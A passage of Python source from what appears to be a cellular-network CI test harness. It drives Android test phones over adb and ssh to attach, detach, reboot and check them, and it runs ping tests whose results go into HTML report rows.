if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
lock.release()
self.close()
html_cell = '<pre style="background-color:white">CAT-M module\nIP Address : ' + moduleIPAddr + '\n' + qMsg + '</pre>'
statusQueue.put(html_cell)
if (packetLossOK):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', 1, statusQueue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', 1, statusQueue)
self.AutoTerminateUEandeNB()
except:
os.kill(os.getppid(),signal.SIGUSR1)
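# Attach one Android UE. mDataConnectionState follows Android's TelephonyManager
# data states (0=DISCONNECTED, 1=CONNECTING, 2=CONNECTED, 3=SUSPENDED); the loop
# polls up to 45 times and retries the flight-mode toggle at 15 and 30 remaining tries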
def AttachUE_common(self, device_id, statusQueue, lock, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
else:
# airplane mode off // radio on
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
time.sleep(2)
max_count = 45
count = max_count
while count > 0:
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "dumpsys telephony.registry" | grep -m 1 mDataConnectionState', '\$', 15)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "dumpsys telephony.registry"\' | grep -m 1 mDataConnectionState', '\$', 60)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('mDataConnectionState Not Found!')
lock.release()
break
mDataConnectionState = int(result.group('state'))
if mDataConnectionState == 2:
logging.debug('\u001B[1mUE (' + device_id + ') Attach Completed\u001B[0m')
lock.acquire()
statusQueue.put(max_count - count)
statusQueue.put(device_id)
statusQueue.put('Attach Completed')
lock.release()
break
count = count - 1
if count == 15 or count == 30:
logging.debug('\u001B[1;30;43m Retry UE (' + device_id + ') Flight Mode Off \u001B[0m')
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
time.sleep(0.5)
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
time.sleep(0.5)
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until mDataConnectionState=2 (' + str(max_count-count) + ' times)\u001B[0m')
time.sleep(1)
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Attach Failed \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('Attach Failed')
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
status_queue = SimpleQueue()
lock = Lock()
nb_ue_to_connect = 0
for device_id in self.UEDevices:
if (self.nbMaxUEtoAttach == -1) or (nb_ue_to_connect < self.nbMaxUEtoAttach):
self.UEDevicesStatus[nb_ue_to_connect] = UE_STATUS_ATTACHING
p = Process(target = self.AttachUE_common, args = (device_id, status_queue, lock,nb_ue_to_connect,))
p.daemon = True
p.start()
multi_jobs.append(p)
nb_ue_to_connect = nb_ue_to_connect + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow('N/A', 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
return
else:
attach_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
attach_status = False
device_id = status_queue.get()
message = status_queue.get()
if (count < 0):
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
else:
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + ' in ' + str(count + 2) + ' seconds</pre>'
html_queue.put(html_cell)
if (attach_status):
cnt = 0
while cnt < len(self.UEDevices):
if self.UEDevicesStatus[cnt] == UE_STATUS_ATTACHING:
self.UEDevicesStatus[cnt] = UE_STATUS_ATTACHED
cnt += 1
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
else:
self.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def DetachUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DetachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
cnt = 0
for device_id in self.UEDevices:
self.UEDevicesStatus[cnt] = UE_STATUS_DETACHING
p = Process(target = self.DetachUE_common, args = (device_id,cnt,))
p.daemon = True
p.start()
multi_jobs.append(p)
cnt += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus[cnt] = UE_STATUS_DETACHED
cnt += 1
def RebootUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
previousmDataConnectionStates = []
# Save mDataConnectionState
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
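# Issued twice on purpose: the first adb invocation can presumably return stale output; only the second result is parsed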
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
sys.exit(1)
previousmDataConnectionStates.append(int(result.group('state')))
# Reboot UE
self.command('stdbuf -o0 adb -s ' + device_id + ' shell reboot', '\$', 10)
time.sleep(60)
previousmDataConnectionState = previousmDataConnectionStates.pop(0)
count = 180
while count > 0:
count = count - 1
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
mDataConnectionState = None
else:
mDataConnectionState = int(result.group('state'))
logging.debug('mDataConnectionState = ' + result.group('state'))
if mDataConnectionState is None or (previousmDataConnectionState == 2 and mDataConnectionState != 2):
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until reboot completion (' + str(180-count) + ' times)\u001B[0m')
time.sleep(1)
else:
logging.debug('\u001B[1mUE (' + device_id + ') Reboot Completed\u001B[0m')
break
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Reboot Failed \u001B[0m')
sys.exit(1)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def RebootUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.RebootUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def DataDisableUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# disable data service
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data disable"', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data disable"\'', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Disabled Data Service\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataDisableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.DataDisableUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def DataEnableUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data enable"', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Enabled Data Service\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataEnableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.DataEnableUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
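# Build the list of UE devices. Centralized mode parses 'adb devices' directly;
# decentralized mode reads /etc/ci/phones_list.txt, a CSV with one line per phone:
# serial,remote-server,remote-user,off-cmd,on-cmd,reboot-cmd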
def GetAllUEDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
self.command('adb devices', '\$', 15)
self.UEDevices = re.findall("\\\\r\\\\n([A-Za-z0-9]+)\\\\tdevice",str(self.ssh.before))
self.close()
else:
if (os.path.isfile('./phones_list.txt')):
os.remove('./phones_list.txt')
self.command('ls /etc/*/phones*.txt', '\$', 5)
result = re.search('/etc/ci/phones_list.txt', str(self.ssh.before))
self.close()
if (result is not None) and (len(self.UEDevices) == 0):
self.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, '/etc/ci/phones_list.txt', '.')
if (os.path.isfile('./phones_list.txt')):
phone_list_file = open('./phones_list.txt', 'r')
for line in phone_list_file.readlines():
line = line.strip()
result = re.search('^#', line)
if result is not None:
continue
comma_split = line.split(",")
self.UEDevices.append(comma_split[0])
self.UEDevicesRemoteServer.append(comma_split[1])
self.UEDevicesRemoteUser.append(comma_split[2])
self.UEDevicesOffCmd.append(comma_split[3])
self.UEDevicesOnCmd.append(comma_split[4])
self.UEDevicesRebootCmd.append(comma_split[5])
phone_list_file.close()
if terminate_ue_flag == False:
if len(self.UEDevices) == 0:
logging.debug('\u001B[1;37;41m UE Not Found! \u001B[0m')
sys.exit(1)
if len(self.UEDevicesStatus) == 0:
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus.append(UE_STATUS_DETACHED)
cnt += 1
def GetAllCatMDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
self.command('lsusb | egrep "Future Technology Devices International, Ltd FT2232C" | sed -e "s#:.*##" -e "s# #_#g"', '\$', 15)
self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",str(self.ssh.before))
else:
if (os.path.isfile('./modules_list.txt')):
os.remove('./modules_list.txt')
self.command('ls /etc/*/modules*.txt', '\$', 5)
result = re.search('/etc/ci/modules_list.txt', str(self.ssh.before))
self.close()
if result is not None:
logging.debug('Found a module list file on ADB server')
if terminate_ue_flag == False:
if len(self.CatMDevices) == 0:
logging.debug('\u001B[1;37;41m CAT-M UE Not Found! \u001B[0m')
sys.exit(1)
self.close()
def CheckUEStatus_common(self, lock, device_id, statusQueue, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "dumpsys telephony.registry"', '\$', 15)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "dumpsys telephony.registry"\'', '\$', 60)
result = re.search('mServiceState=(?P<serviceState>[0-9]+)', str(self.ssh.before))
serviceState = 'Service State: UNKNOWN'
if result is not None:
lServiceState = int(result.group('serviceState'))
if lServiceState == 3:
serviceState = 'Service State: RADIO_POWERED_OFF'
if lServiceState == 1:
serviceState = 'Service State: OUT_OF_SERVICE'
if lServiceState == 0:
serviceState = 'Service State: IN_SERVICE'
if lServiceState == 2:
serviceState = 'Service State: EMERGENCY_ONLY'
result = re.search('mDataConnectionState=(?P<dataConnectionState>[0-9]+)', str(self.ssh.before))
dataConnectionState = 'Data State: UNKNOWN'
if result is not None:
lDataConnectionState = int(result.group('dataConnectionState'))
if lDataConnectionState == 0:
dataConnectionState = 'Data State: DISCONNECTED'
if lDataConnectionState == 1:
dataConnectionState = 'Data State: CONNECTING'
if lDataConnectionState == 2:
dataConnectionState = 'Data State: CONNECTED'
if lDataConnectionState == 3:
dataConnectionState = 'Data State: SUSPENDED'
result = re.search('mDataConnectionReason=(?P<dataConnectionReason>[0-9a-zA-Z_]+)', str(self.ssh.before))
dataConnectionReason = 'Data Reason: UNKNOWN'
if result is not None:
dataConnectionReason = 'Data Reason: ' + result.group('dataConnectionReason')
lock.acquire()
logging.debug('\u001B[1;37;44m Status Check (' + str(device_id) + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + serviceState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionReason + '\u001B[0m')
statusQueue.put(0)
statusQueue.put(device_id)
qMsg = serviceState + '\n' + dataConnectionState + '\n' + dataConnectionReason
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckStatusUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
lock = Lock()
status_queue = SimpleQueue()
i = 0
for device_id in self.UEDevices:
p = Process(target = self.CheckUEStatus_common, args = (lock,device_id,status_queue,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd /opt/flexran_rtc', '\$', 5)
self.command('curl http://localhost:9999/stats | jq \'.\' > log/check_status_' + self.testCase_id + '.log 2>&1', '\$', 5)
self.command('cat log/check_status_' + self.testCase_id + '.log | jq \'.eNB_config[0].UE\' | grep -c rnti | sed -e "s#^#Nb Connected UE = #"', '\$', 5)
result = re.search('Nb Connected UE = (?P<nb_ues>[0-9]+)', str(self.ssh.before))
passStatus = True
if result is not None:
nb_ues = int(result.group('nb_ues'))
htmlOptions = 'Nb Connected UE(s) to eNB = ' + str(nb_ues)
logging.debug('\u001B[1;37;44m ' + htmlOptions + ' \u001B[0m')
if self.expectedNbOfConnectedUEs > -1:
if nb_ues != self.expectedNbOfConnectedUEs:
passStatus = False
else:
htmlOptions = 'N/A'
self.close()
else:
passStatus = True
htmlOptions = 'N/A'
if (status_queue.empty()):
self.CreateHtmlTestRow(htmlOptions, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
check_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
check_status = False
device_id = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
html_queue.put(html_cell)
if check_status and passStatus:
self.CreateHtmlTestRowQueue(htmlOptions, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(htmlOptions, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def GetAllUEIPAddresses(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
ue_ip_status = 0
self.UEIPAddresses = []
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('ifconfig oaitun_ue1', '\$', 4)
result = re.search('inet addr:(?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|inet (?P<ueipaddress2>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', str(self.ssh.before))
if result is not None:
if result.group('ueipaddress') is not None:
UE_IPAddress = result.group('ueipaddress')
else:
UE_IPAddress = result.group('ueipaddress2')
logging.debug('\u001B[1mUE (' + self.UEDevices[0] + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
self.UEIPAddresses.append(UE_IPAddress)
else:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
ue_ip_status -= 1
self.close()
return ue_ip_status
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
idx = 0
for device_id in self.UEDevices:
if self.UEDevicesStatus[idx] != UE_STATUS_ATTACHED:
idx += 1
continue
count = 0
while count < 4:
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "ip addr show | grep rmnet"', '\$', 15)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ip addr show | grep rmnet"\'', '\$', 60)
result = re.search('inet (?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/[0-9]+[0-9a-zA-Z\.\s]+', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
time.sleep(1)
count += 1
else:
count = 10
if count < 9:
ue_ip_status -= 1
continue
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + device_id + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
for ueipaddress in self.UEIPAddresses:
if ueipaddress == UE_IPAddress:
logging.debug('\u001B[1mUE (' + device_id + ') IP Address ' + UE_IPAddress + ': has already been allocated to another device !' + '\u001B[0m')
ue_ip_status -= 1
continue
self.UEIPAddresses.append(UE_IPAddress)
idx += 1
self.close()
return ue_ip_status
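# Common error path for ping/iperf: push (status, device, IP, message) onto the
# status queue under the lock so the parent can build the HTML report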
def ping_iperf_wrong_exit(self, lock, UE_IPAddress, device_id, statusQueue, message):
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(message)
lock.release()
def Ping_common(self, lock, UE_IPAddress, device_id, statusQueue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
if (packetLossOK):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def PingNoS1_wrong_exit(self, qMsg):
html_queue = SimpleQueue()
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
def PingNoS1(self):
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ping_from_eNB = re.search('oaitun_enb1', str(self.ping_args))
if ping_from_eNB is not None:
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
else:
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
try:
if ping_from_eNB is not None:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets/', '\$', 5)
else:
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets/', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with OAI UE crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
logging.debug('\u001B[1;37;44m OAI UE ping result \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
self.close()
html_queue = SimpleQueue()
ip_addr = 'TBD'
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
if packetLossOK:
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
# copy the log to the EPC server for log collection
if ping_from_eNB is not None:
copyin_res = self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
else:
copyin_res = self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'ping_' + self.testCase_id + '.log', self.EPCSourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
